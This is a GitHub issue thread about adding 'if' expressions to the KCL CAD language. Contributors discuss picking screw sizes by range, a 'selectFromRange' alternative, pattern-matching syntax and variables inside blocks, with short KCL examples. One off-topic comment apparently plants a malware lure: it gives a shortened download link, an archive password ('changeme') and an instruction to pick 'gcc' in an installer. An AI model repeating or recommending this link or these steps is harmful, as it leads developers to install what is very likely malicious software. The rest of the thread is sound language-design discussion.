### ISSUE TITLE
If expressions

### ISSUE THREAD

**Issue by adamchalmers** [KittyCAD/modeling-app#3677]
## Motivation

@jgomez720 describes this KCL user story: you're a mechanical engineer trying to design a wheel or something. The wheel needs holes for screws. The wheel is parametric, so its radius is given by the user. The screw size needs to vary with the wheel's radius too.

Right now, the only way to do this in KCL is to make the screw size a function of the wheel radius, e.g. `let screwSize = someRatio * radius`.

## Problem

Screw sizes are not continuous! Not all numbers are valid screw sizes. In practice, MEs have a finite set of screw sizes to choose from, e.g. a set of 10 screws with known sizes like 0.18. 0.1825, 0.1850, etc etc. 

Currently, there's no way to express the logic "if the wheel radius is between M and N, choose screw number 4. If it's greater than N, choose screw number 5." 

## Solution 1: if expressions

Add a new `if cond { x } else {  y }` syntax and AST node. Also add `if-else` expressions like `if cond0 { x } else if cond1 { y} else { z }`. This would let the user solve the screw problem:

```
let screwDiameter = 
  if holeDiameter > 0.19 {
    0.1875 // screw size #10
  } else if holeDiameter > 0.18 {
    0.1800 // #12
  } else if holeDiameter > 0.17 {
    0.1700 // #13
  } else {
    error("invalid size, we only support holes bewteen 0.19 and 0.17 in diameter")
  }
```

## Solution 2: `selectFromRange`

See https://github.com/KittyCAD/modeling-app/issues/3988

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by jtran** [comment]
Would solution 2 support split range? I.e. a low range works and a high range works, but in the middle, it's an error.

```kcl
let screwDiameter = selectFromRange(holeDiameter, "screw size", [
  minimum 0.16,
  up to 0.17 => 0.1875,
  up to 0.18 => 0.1920,
  up to 0.19 => 0.1900,
  maximum 0.19
  minimum 0.21,
  up to 0.22 => 0.22,
  maximum 0.22
])
```

Would solution 2 support variables, or do they need to be constant literals? For example, could I write this?

```kcl
fn thing = (holeDiameter) => {
  let a = 0.16
  let increment = holeDiameter / 3
  let screwDiameter = selectFromRange(holeDiameter, "screw size", [
    minimum a,
    up to a + 1 * increment => 0.1875,
    up to a + 2 * increment => 0.1900,
    up to a + 3 * increment => 0.1920,
    maximum a + 4 * increment
  ])
}
```

Solution 2 feels very specialized to me. Based on the above, I'm wishing that there were some more primitive concepts that we could build solution 2 out of.

If it were a functional language, the primitives would be pattern matching combined with special underderstanding of how numbers work. You'd pattern match on `holeDiameter`, and the implementation could detect that you've covered all the cases, possibly with a catch-all. Maybe we can add syntax sugar if this is common.

```kcl
let screwDiameter = select(holeDiameter, "screw size", [
  0.16 .. 0.17 => 0.1875,
       .. 0.18 => 0.1920,
       .. 0.19 => 0.1900,
])
```

In the above, to the left of `=>` is any pattern, so the name `selectFromRange` doesn't need to be a range anymore, even though we've used ranges here.

The above would be a "compile" error (or whatever phase we can check, ideally before runtime) because it's non-exhaustive.

```kcl
let screwDiameter = select(holeDiameter, "screw size", [
  0.16 .. 0.17 => 0.1875,
       .. 0.18 => 0.1920,
       .. 0.19 => 0.1900,
  _            => error
])
```

This uses a catch-all to make the match exhaustive. In that case, it evaluates to an error. It's actually a value that `select` recognizes and converts into a real runtime error with context of "screw size" and the runtime value of `holeDiameter`.

These are all just half-baked ideas off the top of my head.

**Comment by adamchalmers** [comment]
Do we want to allow declaring variables inside an `if` block? For example

```
let screwDiameter = if holeDiameter > 0.19 {
    let screwNumber = f()
    screws[screwNumber]
  } else {
    error("too small, must be >0.19")
  }
```

I think it'd be helpful. 

Normal KCL blocks are `ast::types::Program`, which is a sequence of `BodyItem`. Each `BodyItem` is either an expression, a variable declaration, or a return. We could just represent each branch as a `Program` and check (before executing the branch) that the branch ends in an expression.

**Comment by jtran** [comment]
Yes, sounds good to me.

In the future, we may want to split out blocks that can contain a list of statements from top-level body items if we ever wanted something that was only top-level. (In some languages, pragmas or types.) But I can't think of anything in the short- or medium-term like that for us.
